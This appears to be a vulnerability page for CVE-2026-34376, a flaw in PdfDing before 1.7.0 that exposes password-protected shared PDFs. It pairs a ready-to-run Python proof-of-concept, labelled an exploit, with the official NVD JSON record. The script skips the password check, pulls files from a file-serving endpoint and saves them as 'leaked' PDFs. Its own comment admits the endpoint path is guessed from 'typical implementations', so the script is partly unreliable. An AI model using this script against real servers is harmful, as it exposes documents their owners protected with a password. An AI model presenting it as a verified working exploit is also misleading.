CVE-2026-34376

import requests def exploit_cve_2026_34376(target_url, file_uuid): """ PoC for CVE-2026-34376. Demonstrates bypassing password protection to download a PDF. """ # Directly access the file serving endpoint # bypassing the password verification flow. # Example endpoint structure based on typical implementations. url = f"{target_url}/api/files/{file_uuid}" headers = { "User-Agent": "Mozilla/5.0 (PoC-Scanner)" } try: response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200 and 'application/pdf' in response.headers.get('Content-Type', ''): print("[+] Exploit successful! File downloaded.") with open(f"leaked_{file_uuid}.pdf", "wb") as f: f.write(response.content) return True else: print(f"[-] Failed to retrieve file. Status: {response.status_code}") return False except Exception as e: print(f"[!] Error: {e}") return False # Usage: exploit_cve_2026_34376("http://target-ip", "pdf-id-here")

{"cve": {"id": "CVE-2026-34376", "sourceIdentifier": "[email protected]", "published": "2026-04-01T18:16:30.177", "lastModified": "2026-04-07T20:16:13.720", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PdfDing is a selfhosted PDF manager, viewer and editor offering a seamless user experience on multiple devices. Prior to version 1.7.0, an access-control vulnerability allows unauthenticated users to retrieve password-protected shared PDFs by directly calling the file-serving endpoint without completing the password verification flow. This results in unauthorized access to confidential documents that users expected to be protected by a shared-link password. This issue has been patched in version 1.7.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pdfding:pdfding:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.7.0", "matchCriteriaId": "2B5F1011-6A2F-4DB7-8192-662436A9918D"}]}]}], "references": [{"url": "https://github.com/mrmn2/PdfDing/commit/ae579ea98c5603d1435e0d90e81d72151564088a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/mrmn2/PdfDing/pull/294", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/mrmn2/PdfDing/releases/tag/v1.7.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/mrmn2/PdfDing/security/advisories/GHSA-42x7-vvj4-4cj3", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}